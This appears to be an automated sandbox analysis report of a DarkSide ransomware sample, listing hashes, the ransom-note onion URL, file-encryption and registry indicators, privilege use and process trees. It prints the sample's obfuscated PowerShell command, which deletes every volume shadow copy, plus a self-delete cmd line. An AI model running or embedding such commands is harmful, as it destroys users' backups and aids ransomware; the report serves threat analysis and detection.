Analysis
- max time kernel: 26s
- max time network: 25s
- platform: windows7_x64
- resource: win7v20210410
- submitted: 17-05-2021 14:07
Static task: static1
Behavioral task: behavioral1 (Sample: sage2.donotopen.exe, Resource: win7v20210410)
Behavioral task: behavioral2 (Sample: sage2.donotopen.exe, Resource: win10v20210408)
General
- Target: sage2.donotopen.exe
- Size: 59KB
- MD5: 7be33b01e9cb99c6e23ae3b02f384a2c
- SHA1: 1f8a236ceafc44eea0c117b9d276d556e3fe53e2
- SHA256: b70a184f36903de934b93c5118561ddb1c3747e365575f92682ef09fbb48d5f8
- SHA512: c053fe23f5b25127bfe17d7eabad31aa7c3d696d78373e90d8ced9182598c4315fd0cb02aec12efee120996874894a0ef56671d3db4adedfcccb0b80c4b1c154
Malware Config
- Extracted from: C:\\README.341d6443.TXT
- Family: darkside
- URL: http://darksidfqzcuhtk2.onion/VFBTTQ0UZGCGIMG4WZLMO06HUN6ZQHEF4AY2K88X4GZJQOT106I95CADXOD0MZ39
Signatures
- DarkSide
  Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
- Modifies extensions of user files (10 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes: sage2.donotopen.exe
    File opened for modification: C:\Users\Admin\Pictures\MergeProtect.tif.341d6443
    File renamed: C:\Users\Admin\Pictures\SelectRead.crw => C:\Users\Admin\Pictures\SelectRead.crw.341d6443
    File opened for modification: C:\Users\Admin\Pictures\ConnectSet.crw.341d6443
    File renamed: C:\Users\Admin\Pictures\DenyRequest.png => C:\Users\Admin\Pictures\DenyRequest.png.341d6443
    File opened for modification: C:\Users\Admin\Pictures\DenyRequest.png.341d6443
    File opened for modification: C:\Users\Admin\Pictures\SelectPop.raw.341d6443
    File opened for modification: C:\Users\Admin\Pictures\SelectRead.crw.341d6443
    File renamed: C:\Users\Admin\Pictures\ConnectSet.crw => C:\Users\Admin\Pictures\ConnectSet.crw.341d6443
    File renamed: C:\Users\Admin\Pictures\MergeProtect.tif => C:\Users\Admin\Pictures\MergeProtect.tif.341d6443
    File renamed: C:\Users\Admin\Pictures\SelectPop.raw => C:\Users\Admin\Pictures\SelectPop.raw.341d6443
- Deletes itself (1 IoC)
  Processes: cmd.exe (PID 2840)
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Sets desktop wallpaper using registry (2 TTPs, 2 IoCs)
  Processes: sage2.donotopen.exe
    Set value (str): \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\341d6443.BMP"
    Set value (str): \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\341d6443.BMP"
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Modifies Control Panel (1 IoC)
  Processes: sage2.donotopen.exe
    Set value (str): \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Control Panel\Desktop\WallpaperStyle = "10"
- Modifies registry class (5 IoCs)
  Processes: sage2.donotopen.exe
    Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443
    Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\.341d6443\ = "341d6443"
    Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon
    Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443
    Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\341d6443\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\341d6443.ico"
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  Processes: powershell.exe (PID 1616, 2 IoCs), sage2.donotopen.exe (PID 788, 2 IoCs)
- Suspicious use of AdjustPrivilegeToken (24 IoCs)
  Processes: sage2.donotopen.exe (PID 788), powershell.exe (PID 1616), vssvc.exe (PID 1644)
    sage2.donotopen.exe (788) tokens: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
    powershell.exe (1616) tokens: SeDebugPrivilege
    vssvc.exe (1644) tokens: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
- Suspicious use of WriteProcessMemory (8 IoCs)
  Processes: sage2.donotopen.exe
    PID 788 (sage2.donotopen.exe) wrote to memory of PID 1616 (powershell.exe), 4 times
    PID 788 (sage2.donotopen.exe) wrote to memory of PID 2840 (cmd.exe), 4 times
Processes
- C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe (tree level 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\sage2.donotopen.exe"
  - Modifies extensions of user files
  - Sets desktop wallpaper using registry
  - Modifies Control Panel
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree level 2, child of sage2.donotopen.exe)
  Command line: powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
  The loop rebuilds a 62-character string from the hex two characters at a time and hands it to iex; it decodes to a Get-WmiObject Win32_Shadowcopy pipeline that calls Delete() on every shadow copy, which is what the vssvc.exe activity and its SeBackupPrivilege/SeRestorePrivilege tokens correspond to.
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\SysWOW64\cmd.exe (tree level 2, child of sage2.donotopen.exe)
  Command line: "C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\SAGE2D~1.EXE >> NUL
  - Deletes itself
- C:\Windows\system32\vssvc.exe (tree level 1)
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
  MD5: dab8d891d3796ee132d648b719db343c
  SHA1: 8eab3909265c184a9a26893589836f047591c54c
  SHA256: 7e2ec9da9919c4f541728636bfac5e74405033f0f7e7bd733c3e68d82349f786
  SHA512: 305ca5f6aff09b5d645b5ce1e74b5fe22227fa6d6d70c4ab3dd165b1a140857f929a1727ea341fff063d1dc39756d037d0aac2c10a8ea0f9757ad111edc90d87
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  MD5: 5fcb6bbfb6b9dfcc7478f6cfa20f8bf0
  SHA1: 3c0ac7025e2d9aa30ef10a51313d152307f46dd1
  SHA256: 4a2b89babae45fbedb1c4b80f696fbc89a8b13249789647f55c64cbb878e2a64
  SHA512: be9c5563f3c7430369359dbb7a548d6135773ae49b11047eb8acb7fa5c849e979456c06a49b27dd0a862ef1886930e7ad3e182e265f43e6cf1bca70874b30fed
- memory/788-59-0x0000000075551000-0x0000000075553000-memory.dmp (8KB)
- memory/1616-66-0x000000001AC14000-0x000000001AC16000-memory.dmp (8KB)
- memory/1616-63-0x000000001AC90000-0x000000001AC91000-memory.dmp (4KB)
- memory/1616-64-0x0000000002280000-0x0000000002281000-memory.dmp (4KB)
- memory/1616-62-0x0000000001ED0000-0x0000000001ED1000-memory.dmp (4KB)
- memory/1616-65-0x000000001AC10000-0x000000001AC12000-memory.dmp (8KB)
- memory/1616-67-0x0000000001F10000-0x0000000001F11000-memory.dmp (4KB)
- memory/1616-68-0x000000001C4C0000-0x000000001C4C1000-memory.dmp (4KB)
- memory/1616-69-0x000000001C590000-0x000000001C591000-memory.dmp (4KB)
- memory/1616-61-0x000007FEFBC81000-0x000007FEFBC83000-memory.dmp (8KB)
- memory/1616-60-0x0000000000000000-mapping.dmp
- memory/2840-72-0x0000000000000000-mapping.dmp